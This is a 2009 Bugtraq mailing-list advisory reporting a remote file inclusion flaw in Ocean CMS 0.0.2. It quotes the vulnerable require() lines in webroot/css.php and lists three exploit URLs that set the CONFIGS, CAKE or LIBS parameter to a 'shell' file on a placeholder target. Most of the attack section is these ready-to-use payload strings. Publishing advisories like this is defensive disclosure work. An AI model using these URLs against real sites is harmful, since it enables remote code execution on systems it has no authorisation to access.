[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Ocean CMS 0.0.2 Remote File Inclusion Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Ocean CMS 0.0.2 Remote File Inclusion Vulnerability
- From: "Cru3l.b0y" <cru3l.b0y@xxxxxxxxx>
- Date: Thu, 23 Jul 2009 08:16:44 +0430
Hi Dear,
I found a new bug. please publish it.
thank you
bet regards
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+
+ Ocean CMS 0.0.2 Remote File Inclusion Vulnerability +
+ +
+ Discovered by Cru3l.b0y +
+ +
+ WwW.DeltaHacking.Net +
+ +
+ +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
###################################################################################################
AUTHOR : Cru3l.b0y
APPLICATION : Ocean CMS
VERSION : 0.0.2
DOWNLOAD : http://cakeforge.org/frs/download.php/113/OceanCMS.tar.bz
VENDOR : http://cakeforge.org/
###################################################################################################
Vulnerable Code :
###################################################################################################
/webroot/css.php
34 require(CONFIGS.'paths.php');
35 require(CAKE.'basics.php');
36 require(LIBS.'folder.php');
[+]Exploit: http://[t4rg3t]/[p4th]/webroot/css.php?CONFIGS=shell
[+]Exploit: http://[t4rg3t]/[p4th]/webroot/css.php?CAKE=shell
[+]Exploit: http://[t4rg3t]/[p4th]/webroot/css.php?LIBS=shell
###################################################################################################